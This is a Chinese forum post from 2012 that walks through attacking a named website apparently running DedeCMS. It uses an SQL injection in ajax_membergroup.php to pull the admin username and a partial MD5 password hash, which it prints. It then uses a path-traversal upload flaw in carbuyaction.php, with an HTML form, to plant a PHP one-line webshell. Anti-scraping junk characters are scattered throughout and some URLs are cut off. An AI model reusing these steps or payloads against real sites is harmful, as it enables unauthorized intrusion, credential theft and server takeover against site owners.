①注入漏洞。
, o7 j, ]0 l. }0 x这站 http://www.political-security.com/. M3 ~7 V( t3 X! Z( Z9 y3 E
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,4 w# K, o. l- s" t# D" A6 f! F
www.political-security.com/data/mysql_error_trace.inc 爆后台
$ V9 j' Y6 Z3 \* Q* _9 b* j然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
3 Q {$ l1 \; z2 F( x& I6 M( _然后写上语句 # P; M5 n. P" ~4 k
查看管理员帐号
( ? j0 A$ I e: [5 ^$ P U' Bhttp://www.political-security.co ... &membergroup=@`2 L: S1 I( G/ B' m/ u- a* Z
7 g$ Z- }; Y/ a. Z F1 Tadmin 9 N6 M! l( y, {9 w/ R* y
( \/ m2 {: _) u5 K
查看管理员密码7 }& ~/ f( O4 G
http://www.political-security.co ... &membergroup=@`( h- B2 S/ q% J( E# ?* d c
; H; S" _! L- Q3 Q
8d29b1ef9f8c5a5af429
; R( J% M1 N% z" W% ]
2 ]8 z" Q$ n0 A, D, E; z查看管理员密码 L. u0 U) s' H2 X" Q- ~
8 G! r8 q5 @3 l& h/ s$ d* X
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
' L% U5 Y. G) } D1 D
/ Q: ~; M, f9 i1 _! h" Q( _1 w8d27 e- l- C. n" R' ~
9b1ef9f8c5a5af42+ @. T& }# K4 D) P: @$ b9 T
9
0 m e1 t. T, ?3 s
& }2 w6 M+ @3 w/ t7 a% Ycmd5没解出来 只好测试第二个方法
( n. s9 a' l# e/ S
4 A7 C3 l3 w9 W. ~: L% x* i6 H( X1 s {( P- B
②上传漏洞:
9 I" t$ D: A# {+ F+ O8 ^! ]' d4 O- ^* x% E0 }4 f! P, C
只要登陆会员中心,然后访问页面链接
! j# }3 R! {( v0 j8 S/ d( Q“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
8 p$ K1 p1 _( B u: _5 `7 T" L' Q1 g8 _, D( h$ p
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”' \6 S" W, C/ Q) a2 N/ Q, D& Q
. P) \9 F8 z g/ e: o! P
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm# @! P8 O3 H W4 A7 i
# e' z3 F* M1 ]' Z2 I2 u2 z: |
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>0 X+ j& Z4 M8 S8 D
或者
& ?6 a. C5 |+ r% Z- E即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对